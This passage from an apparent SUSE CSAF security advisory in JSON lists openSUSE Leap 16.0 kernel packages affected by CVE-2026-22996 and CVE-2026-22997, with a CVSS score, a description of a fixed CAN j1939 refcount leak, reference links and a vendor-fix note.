"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-22996"
},
{
"cve": "CVE-2026-22997",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22997"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts\n\nSince j1939_session_deactivate_activate_next() in j1939_tp_rxtimer() is\ncalled only when the timer is enabled, we need to call\nj1939_session_deactivate_activate_next() if we cancelled the timer.\nOtherwise, refcount for j1939_session leaks, which will later appear as\n\n| unregister_netdevice: waiting for vcan0 to become free. Usage count = 2.\n\nproblem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22997",
"url": "https://www.suse.com/security/cve/CVE-2026-22997"
},
{
"category": "external",
"summary": "SUSE Bug 1257202 for CVE-2026-22997",
"url": "https://bugzilla.suse.com/1257202"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
